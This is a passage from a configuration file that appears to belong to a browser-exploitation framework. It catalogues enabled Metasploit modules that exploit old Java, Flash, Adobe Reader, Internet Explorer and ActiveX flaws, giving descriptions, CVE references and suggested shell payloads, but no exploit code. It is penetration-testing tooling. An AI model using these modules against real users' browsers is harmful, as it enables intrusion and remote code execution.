\t\t\t\trepresentation are allowed. Invalid characters will be replaced with\n\
\t\t\t\tquestion marks ('?').\n\n\
\t\t\t\tThis vulnerability was originally discovered independently by both Stephen\n\
\t\t\t\tFewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n\
\t\t\t\tbeen done, all versions since version 6 Update 10 are believed to be affected\n\
\t\t\t\tby this vulnerability.\n\n\
\t\t\t\tThis vulnerability was patched as part of the October 2010 Oracle Patch\n\
\t\t\t\trelease.\n\
\t\t\t"
authors:
- - CVE
- 2010-3552
- - OSVDB
- "68873"
- - BID
- "44023"
- - URL
- http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-206/
- - URL
- http://code.google.com/p/skylined/issues/detail?id=23
- - URL
- http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/
- - URL
- http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_avm:
enable: true
msf: true
msf_key: windows/browser/adobe_flashplayer_avm
name: Adobe Flash Player AVM Bytecode Verification Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33\n\
\t\t\t\tand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n\
\t\t\t\tlogic. This results in unsafe JIT (Just-In-Time) code being executed.\n\n\
\t\t\t\t\tSpecifically, this issue results in uninitialized memory being referenced and later\n\
\t\t\t\texecuted. Taking advantage of this issue relies on heap spraying and controlling the\n\
\t\t\t\tuninitialized memory.\n\n\
\t\t\t\t\tCurrently this exploit works for IE6, IE7, and Firefox 3.6 and likely several\n\
\t\t\t\tother browsers. DEP does catch the exploit and causes it to fail. Due to the nature\n\
\t\t\t\tof the uninitialized memory it is fairly difficult to get around this restriction.\n\
\t\t\t\t"
authors:
- - CVE
- 2011-0609
- - OSVDB
- "71254"
- - URL
- http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html
- - URL
- http://www.adobe.com/devnet/swf.html
- - URL
- http://www.adobe.com/support/security/advisories/apsa11-01.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_jbig2decode:
enable: true
msf: true
msf_key: windows/fileformat/adobe_jbig2decode
name: Adobe JBIG2Decode Memory Corruption Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n\
\t\t\t\t\tThis module relies upon javascript for the heap spray.\n\
\t\t\t"
authors:
- - CVE
- 2009-0658
- - OSVDB
- "52073"
- - URL
- http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html
path: extensions/metasploit/
class: Msf_module
msf_windvd7_applicationtype:
enable: true
msf: true
msf_key: windows/browser/windvd7_applicationtype
name: WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n\
\t\t\t\tcontrol in InterVideo WinDVD 7. By sending an overly long string\n\
\t\t\t\tto the \"ApplicationType()\" property, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0348
- - OSVDB
- "34315"
- - BID
- "23071"
path: extensions/metasploit/
class: Msf_module
msf_ms06_071_xml_core:
enable: true
msf: true
msf_key: windows/browser/ms06_071_xml_core
name: Internet Explorer XML Core Services HTTP Request Handling
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft XML Core Services which\n\
\t\t\t\texists in the XMLHTTP ActiveX control. This module is a modified version of\n\
\t\t\t\thttp://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n\
\t\t\t\ttested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n\
\t\t\t\t+ Microsoft XML Core Services 4.0 SP2.\n\
\t\t\t"
authors:
- - CVE
- 2006-5745
- - OSVDB
- "29425"
- - MSB
- MS06-071
- - BID
- "20915"
path: extensions/metasploit/
class: Msf_module
msf_juniper_sslvpn_ive_setupdll:
enable: true
msf: true
msf_key: windows/browser/juniper_sslvpn_ive_setupdll
name: Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n\
\t\t\t\tlibrary which is called by the JuniperSetup.ocx ActiveX control,\n\
\t\t\t\tas part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n\
\t\t\t\toverly long string to the ProductName object parameter, the stack\n\
\t\t\t\tis overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2006-2086
- - OSVDB
- "25001"
- - BID
- "17712"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html
path: extensions/metasploit/
class: Msf_module
msf_apple_itunes_playlist:
enable: true
msf: true
msf_key: windows/browser/apple_itunes_playlist
name: Apple ITunes 4.7 Playlist Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Apple iTunes 4.7\n\
\t\t\t\tbuild 4.7.0.42. By creating a URL link to a malicious PLS\n\
\t\t\t\tfile, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code. When using this module, be sure to set the\n\
\t\t\t\tURIPATH with an extension of '.pls'.\n\
\t\t\t"
authors:
- - CVE
- 2005-0043
- - OSVDB
- "12833"
- - BID
- "12238"
path: extensions/metasploit/
class: Msf_module
msf_tumbleweed_filetransfer:
enable: true
msf: true
msf_key: windows/browser/tumbleweed_filetransfer
name: Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the vcst_eu.dll\n\
\t\t\t\tFileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n\
\t\t\t\tSecureTransport suite. By sending an overly long string to the\n\
\t\t\t\tTransferFile() 'remotefile' function, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1724
- - OSVDB
- "44252"
- - URL
- http://www.aushack.com/200708-tumbleweed.txt
path: extensions/metasploit/
class: Msf_module
msf_ms10_046_shortcut_icon_dllloader:
enable: true
msf: true
msf_key: windows/browser/ms10_046_shortcut_icon_dllloader
name: Microsoft Windows Shell LNK Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the handling of Windows\n\
\t\t\t\tShortcut files (.LNK) that contain an icon resource pointing to a\n\
\t\t\t\tmalicious DLL. This module creates a WebDAV service that can be used\n\
\t\t\t\tto run an arbitrary payload when accessed as a UNC path.\n\
\t\t\t"
authors:
- - CVE
- 2010-2568
- - OSVDB
- "66387"
- - MSB
- MS10-046
- - URL
- http://www.microsoft.com/technet/security/advisory/2286198.mspx
path: extensions/metasploit/
class: Msf_module
msf_mcafeevisualtrace_tracetarget:
enable: true
msf: true
msf_key: windows/browser/mcafeevisualtrace_tracetarget
name: McAfee Visual Trace ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n\
\t\t\t\tControl (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n\
\t\t\t\t\"TraceTarget()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6707
- - OSVDB
- "32399"
- - URL
- http://secunia.com/advisories/23463
path: extensions/metasploit/
class: Msf_module
msf_orbit_connecting:
enable: true
msf: true
msf_key: windows/browser/orbit_connecting
name: Orbit Downloader Connecting Log Creation Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n\
\t\t\t\tattacker serves up a malicious web site, arbitrary code may be executed.\n\
\t\t\t\tThe PAYLOAD windows/shell_bind_tcp works best.\n\
\t\t\t"
authors:
- - CVE
- 2009-0187
- - OSVDB
- "52294"
- - BID
- "33894"
path: extensions/metasploit/
class: Msf_module
msf_kazaa_altnet_heap:
enable: true
msf: true
msf_key: windows/browser/kazaa_altnet_heap
name: Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n\
\t\t\t\tControl (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n\
\t\t\t\tBy sending an overly long string to the \"Install()\" method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5217
- - OSVDB
- "37785"
- - URL
- http://secunia.com/advisories/26970/
path: extensions/metasploit/
class: Msf_module
msf_ms08_041_snapshotviewer:
enable: true
msf: true
msf_key: windows/browser/ms08_041_snapshotviewer
name: Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a user's file system\n\
\t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\n\
\t\t\t"
authors:
- - CVE
- 2008-2463
- - OSVDB
- "46749"
- - MSB
- MS08-041
- - BID
- "30114"
path: extensions/metasploit/
class: Msf_module
msf_java_codebase_trust:
enable: true
msf: true
msf_key: windows/browser/java_codebase_trust
name: Sun Java Applet2ClassLoader Remote Code Execution Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\
\t\t\t\tthat allows an attacker to run an applet outside of the Java Sandbox. When\n\
\t\t\t\tan applet is invoked with:\n\n\
\t\t\t\t1. A \"codebase\" parameter that points at a trusted directory\n\
\t\t\t\t2. A \"code\" parameter that is a URL that does not contain any dots\n\n\
\t\t\t\tthe applet will run outside of the sandbox.\n\n\
\t\t\t\tThis vulnerability affects JRE prior to version 6 update 24.\n\
\t\t\t"
authors:
- - CVE
- 2010-4452
- - OSVDB
- "71193"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-084/
- - URL
- http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/
- - URL
- http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html
path: extensions/metasploit/
class: Msf_module
msf_awingsoft_web3d_bof:
enable: true
msf: true
msf_key: windows/browser/awingsoft_web3d_bof
name: AwingSoft Winds3D Player SceneURL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a data segment buffer overflow within Winds3D Viewer of\n\
\t\t\t\tAwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n\
\t\t\t\tAwingSoft Web3D Player.\n\
\t\t\t\tBy setting an overly long value to the 'SceneURL' property, an attacker can\n\
\t\t\t\toverrun a buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4588
- - OSVDB
- "60017"
- - URL
- http://www.milw0rm.com/exploits/9116
- - URL
- http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
- - URL
- http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/
path: extensions/metasploit/
class: Msf_module
msf_aim_goaway:
enable: true
msf: true
msf_key: windows/browser/aim_goaway
name: AOL Instant Messenger goaway Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the handling of AOL Instant\n\
\t\t\t\tMessenger's 'goaway' URI handler. An attacker can execute\n\
\t\t\t\tarbitrary code by supplying an overly sized buffer as the\n\
\t\t\t\t'message' parameter. This issue is known to affect AOL Instant\n\
\t\t\t\tMessenger 5.5.\n\
\t\t\t"
authors:
- - CVE
- 2004-0636
- - OSVDB
- "8398"
- - BID
- "10889"
- - URL
- http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_autodesk_idrop:
enable: true
msf: true
msf_key: windows/browser/autodesk_idrop
name: Autodesk IDrop ActiveX Control Heap Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap-based memory corruption vulnerability in\n\
\t\t\t\tAutodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.\n\
\t\t\t\tAn attacker can execute arbitrary code by triggering a heap use after\n\
\t\t\t\tfree condition using the Src, Background, PackageXml properties.\n\
\t\t\t"
authors:
- - OSVDB
- "53265"
- - BID
- "34352"
- - URL
- http://www.milw0rm.com/exploits/8560
- - URL
- http://marc.info/?l=full-disclosure&m=123870112214736
path: extensions/metasploit/
class: Msf_module
msf_aol_icq_downloadagent:
enable: true
msf: true
msf_key: windows/browser/aol_icq_downloadagent
name: America Online ICQ ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to download and execute arbitrary files\n\
\t\t\t\ton a user's system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.\n\
\t\t\t"
authors:
- - CVE
- 2006-5650
- - OSVDB
- "30220"
- - BID
- "20930"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-037/
path: extensions/metasploit/
class: Msf_module
msf_aventail_epi_activex:
enable: true
msf: true
msf_key: windows/browser/aventail_epi_activex
name: SonicWALL Aventail epi.dll AuthCredential Format String Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability within version 10.0.4.x and\n\
\t\t\t\t10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX\n\
\t\t\t\tcontrol (epi.dll). By calling the 'AuthCredential' method with a specially\n\
\t\t\t\tcrafted Unicode format string, an attacker can cause memory corruption and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tUnfortunately, it does not appear to be possible to indirectly re-use existing\n\
\t\t\t\tstack data for more reliable exploitation. This is due to several particulars\n\
\t\t\t\tabout this vulnerability. First, the format string must be a Unicode string,\n\
\t\t\t\twhich uses two bytes per character. Second, the buffer is allocated on the\n\
\t\t\t\tstack using the 'alloca' function. As such, each additional format specifier (%x)\n\
\t\t\t\twill add four more bytes to the size allocated. This results in the inability to\n\
\t\t\t\tmove the read pointer outside of the buffer.\n\n\
\t\t\t\tFurther testing showed that using specifiers that pop more than four bytes does\n\
\t\t\t\tnot help. Any number of format specifiers will result in accessing the same value\n\
\t\t\t\twithin the buffer.\n\n\
\t\t\t\tNOTE: It may be possible to leverage the vulnerability to leak memory contents.\n\
\t\t\t\tHowever, that has not been fully investigated at this time.\n\
\t\t\t"
authors:
- - OSVDB
- "67286"
- - URL
- http://sotiriu.de/adv/NSOADV-2010-005.txt
path: extensions/metasploit/
class: Msf_module
msf_hp_loadrunner_addfile:
enable: true
msf: true
msf_key: windows/browser/hp_loadrunner_addfile
name: Persits XUpload ActiveX AddFile Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control (version 3.0.0.3) that is included in HP LoadRunner 9.5.\n\
\t\t\t\tBy passing an overly long string to the AddFile method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0492
- - OSVDB
- "40762"
- - BID
- "27456"
- - URL
- http://www.milw0rm.com/exploits/4987
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_datetime:
enable: true
msf: true
msf_key: windows/browser/novelliprint_datetime
name: Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\
\t\t\t\tpassing a specially crafted date/time string via certain parameters to ienipp.ocx\n\
\t\t\t\tan attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\
\t\t\t\tvulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-1569
- - BID
- "37242"
- - OSVDB
- "60804"
- - URL
- http://secunia.com/advisories/35004/
path: extensions/metasploit/
class: Msf_module
msf_zenturiprogramchecker_unsafe:
enable: true
msf: true
msf_key: windows/browser/zenturiprogramchecker_unsafe
name: Zenturi ProgramChecker ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a user's file system\n\
\t\t\t\tvia the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.\n\
\t\t\t"
authors:
- - CVE
- 2007-2987
- - OSVDB
- "36715"
- - BID
- "24217"
path: extensions/metasploit/
class: Msf_module
msf_realplayer_cdda_uri:
enable: true
msf: true
msf_key: windows/browser/realplayer_cdda_uri
name: RealNetworks RealPlayer CDDA URI Initialization Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an initialization flaw within RealPlayer 11/11.1 and\n\
\t\t\t\tRealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n\
\t\t\t\tinitialization failure. However, this failure is improperly handled and\n\
\t\t\t\tuninitialized memory is executed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3747
- - OSVDB
- "68673"
- - BID
- "44144"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-210/
- - URL
- http://service.real.com/realplayer/security/10152010_player/en/
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_target_frame:
enable: true
msf: true
msf_key: windows/browser/novelliprint_target_frame
name: Novell iPrint Client ActiveX Control target-frame Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\
\t\t\t\tpassing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n\
\t\t\t\tan attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\
\t\t\t\tvulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-1568
- - BID
- "37242"
- - OSVDB
- "60803"
- - URL
- http://secunia.com/advisories/37169/
path: extensions/metasploit/
class: Msf_module
msf_roxio_cineplayer:
enable: true
msf: true
msf_key: windows/browser/roxio_cineplayer
name: Roxio CinePlayer ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n\
\t\t\t\tcontrol (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n\
\t\t\t\tBy setting an overly long value to 'DiskType', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1559
- - OSVDB
- "34779"
- - BID
- "23412"
path: extensions/metasploit/
class: Msf_module
msf_dxstudio_player_exec:
enable: true
msf: true
msf_key: windows/browser/dxstudio_player_exec
name: Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability within the\n\
\t\t\t\tDX Studio Player from Worldweaver. The player is a browser plugin for\n\
\t\t\t\tIE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web\n\
\t\t\t\tpage referring to a specially crafted .dxstudio document, an attacker can\n\
\t\t\t\texecute arbitrary commands.\n\n\
\t\t\t\tTesting was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and\n\
\t\t\t\tIE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow\n\
\t\t\t\tthe plug-in to access local files. This prompt appears to occur only once per\n\
\t\t\t\tserver host.\n\n\
\t\t\t\tNOTE: This exploit uses additionally dangerous script features to write to\n\
\t\t\t\tlocal files!\n\
\t\t\t"
authors:
- - CVE
- 2009-2011
- - BID
- "35273"
- - OSVDB
- "54969"
- - URL
- http://www.exploit-db.com/exploits/8922
- - URL
- http://dxstudio.com/guide.aspx
path: extensions/metasploit/
class: Msf_module
msf_realplayer_smil:
enable: true
msf: true
msf_key: windows/browser/realplayer_smil
name: RealNetworks RealPlayer SMIL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n\
\t\t\t\tBy creating a URL link to a malicious SMIL file, a remote attacker could\n\
\t\t\t\toverflow a buffer and execute arbitrary code.\n\
\t\t\t\tWhen using this module, be sure to set the URIPATH with an extension of '.smil'.\n\
\t\t\t\tThis module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n\
\t\t\t\tbuild 6.0.9.584.\n\
\t\t\t"
authors:
- - CVE
- 2005-0455
- - OSVDB
- "14305"
- - BID
- "12698"
path: extensions/metasploit/
class: Msf_module
msf_java_ws_arginject_altjvm:
enable: true
msf: true
msf_key: windows/browser/java_ws_arginject_altjvm
name: Sun Java Web Start Plugin Command Line Argument Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the Web Start plugin component of Sun Java\n\
\t\t\t\tWeb Start. The arguments passed to Java Web Start are not properly validated.\n\
\t\t\t\tBy passing the lesser known -J option, an attacker can pass arbitrary options\n\
\t\t\t\tdirectly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n\
\t\t\t\tby Ruben Santamarta, an attacker can execute arbitrary code in the context of\n\
\t\t\t\tan unsuspecting browser user.\n\n\
\t\t\t\tThis vulnerability was originally discovered independently by both Ruben\n\
\t\t\t\tSantamarta and Tavis Ormandy. Tavis reported that all versions since version\n\
\t\t\t\t6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n\
\t\t\t\tIn order for this module to work, it must be run as root on a server that\n\
\t\t\t\tdoes not serve SMB. Additionally, the target host must have the WebClient\n\
\t\t\t\tservice (WebDAV Mini-Redirector) enabled.\n\
\t\t\t"
authors:
- - CVE
- 2010-0886
- - OSVDB
- "63648"
- - BID
- "39346"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_flash10o:
enable: true
msf: true
msf_key: windows/browser/adobe_flashplayer_flash10o
name: Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player that was discovered, and\n\
\t\t\t\thas been exploited actively in the wild. By embedding a specially crafted .swf file,\n\
\t\t\t\tAdobe Flash crashes due to an invalid use of an object type, which allows attackers to\n\
\t\t\t\toverwrite a pointer in memory, and results in arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2011-0611
- - OSVDB
- "71686"
- - BID
- "47314"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb11-07.html
- - URL
- http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx
- - URL
- http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
- - URL
- http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html
- - URL
- http://secunia.com/blog/210
path: extensions/metasploit/
class: Msf_module
msf_ms06_067_keyframe:
enable: true
msf: true
msf_key: windows/browser/ms06_067_keyframe
name: Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a heap overflow vulnerability in the KeyFrame method of the\n\
\t\t\t\tdirect animation ActiveX control. This is a port of the exploit implemented by\n\
\t\t\t\tAlexander Sotirov.\n\
\t\t\t"
authors:
- - CVE
- 2006-4777
- - OSVDB
- "28842"
- - BID
- "20047"
- - MSB
- MS06-067
- - URL
- https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_officescan:
enable: true
msf: true
msf_key: windows/http/trendmicro_officescan
name: Trend Micro OfficeScan Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Trend Micro OfficeScan\n\
\t\t\t\tcgiChkMasterPwd.exe (running with SYSTEM privileges).\n\
\t\t\t"
authors:
- - CVE
- 2008-1365
- - OSVDB
- "42499"
path: extensions/metasploit/
class: Msf_module
msf_ms11_050_mshtml_cobjectelement:
enable: true
msf: true
msf_key: windows/browser/ms11_050_mshtml_cobjectelement
name: MS11-050 IE mshtml!CObjectElement Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a use-after-free vulnerability in Internet Explorer. The\n\
\t\t\t\tvulnerability occurs when an invalid <object> tag exists and other elements\n\
\t\t\t\toverlap/cover where the object tag should be when rendered (due to their\n\
\t\t\t\tstyles/positioning). The mshtml!CObjectElement is then freed from memory because\n\
\t\t\t\tit is invalid. However, the mshtml!CDisplay object for the page continues to keep\n\
\t\t\t\ta reference to the freed <object> and attempts to call a function on it, leading\n\
\t\t\t\tto the use-after-free.\n\n\
\t\t\t\tPlease note that for IE 8 targets, JRE (Java Runtime Environment) is required to\n\
\t\t\t\tbypass DEP.\n\
\t\t\t"
authors:
- - CVE
- 2011-1260
- - OSVDB
- "72950"
- - MSB
- MS11-050
- - URL
- http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
path: extensions/metasploit/
class: Msf_module
msf_barcode_ax49:
enable: true
msf: true
msf_key: windows/browser/barcode_ax49
name: RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in RKD Software Barcode Application\n\
\t\t\t\tActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint\n\
\t\t\t\tmethod of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - URL
- http://www.milw0rm.com/exploits/4094
- - OSVDB
- "37482"
- - BID
- "24596"
- - CVE
- 2007-3435
path: extensions/metasploit/
class: Msf_module
msf_yahoomessenger_server:
enable: true
msf: true
msf_key: windows/browser/yahoomessenger_server
name: Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n\
\t\t\t\tControl (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n\
\t\t\t\tBy sending an overly long string to the \"Server()\" method, and then calling\n\
\t\t\t\tthe \"Send()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t\tUsing the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n\
\t\t\t\tyields the best results.\n\
\t\t\t"
authors:
- - CVE
- 2007-3147
- - OSVDB
- "37082"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html
path: extensions/metasploit/
class: Msf_module
msf_winzip_fileview:
enable: true
msf: true
msf_key: windows/browser/winzip_fileview
name: WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n\
\t\t\t\tremote attacker to execute arbitrary code on the system. The control contains\n\
\t\t\t\tseveral unsafe methods and is marked safe for scripting and safe for initialization.\n\
\t\t\t\tA remote attacker could exploit this vulnerability to execute arbitrary code on the\n\
\t\t\t\tvictim system. WinZip 10.0 <= Build 6667 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2006-5198
- - OSVDB
- "30433"
- - BID
- "21060"
path: extensions/metasploit/
class: Msf_module
msf_chilkat_crypt_writefile:
enable: true
msf: true
msf_key: windows/browser/chilkat_crypt_writefile
name: Chilkat Crypt ActiveX WriteFile Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows attackers to execute code via the 'WriteFile' unsafe method of\n\
\t\t\t\tChilkat Software Inc's Crypt ActiveX control.\n\n\
\t\t\t\tThis exploit is based on shinnai's exploit that uses an hcp:// protocol URI to\n\
\t\t\t\texecute our payload immediately. However, this method requires that the victim user\n\
\t\t\t\tbe browsing with Administrator. Additionally, this method will not work on newer\n\
\t\t\t\tversions of Windows.\n\n\
\t\t\t\tNOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at\n\
\t\t\t\tthe time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.\n\
\t\t\t"
authors:
- - CVE
- 2008-5002
- - OSVDB
- "49510"
- - BID
- "32073"
- - URL
- http://www.exploit-db.com/exploits/6963
path: extensions/metasploit/
class: Msf_module
msf_ms10_018_ie_behaviors:
enable: true
msf: true
msf_key: windows/browser/ms10_018_ie_behaviors
name: Internet Explorer DHTML Behaviors Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a use-after-free vulnerability within the DHTML behaviors\n\
\t\t\t\tfunctionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n\
\t\t\t\tdiscovered being used in-the-wild and was previously known as the \"iepeers\"\n\
\t\t\t\tvulnerability. The name comes from Microsoft's suggested workaround to block\n\
\t\t\t\taccess to the iepeers.dll file.\n\n\
\t\t\t\tAccording to Nico Waisman, \"The bug itself is when trying to persist an object\n\
\t\t\t\tusing the setAttribute, which end up calling VariantChangeTypeEx with both the\n\
\t\t\t\tsource and the destination being the same variant. So if you send as a variant\n\
\t\t\t\tan IDISPATCH the algorithm will try to do a VariantClear of the destination before\n\
\t\t\t\tusing it. This will end up on a call to PlainRelease which deref the reference\n\
\t\t\t\tand clean the object.\"\n\n\
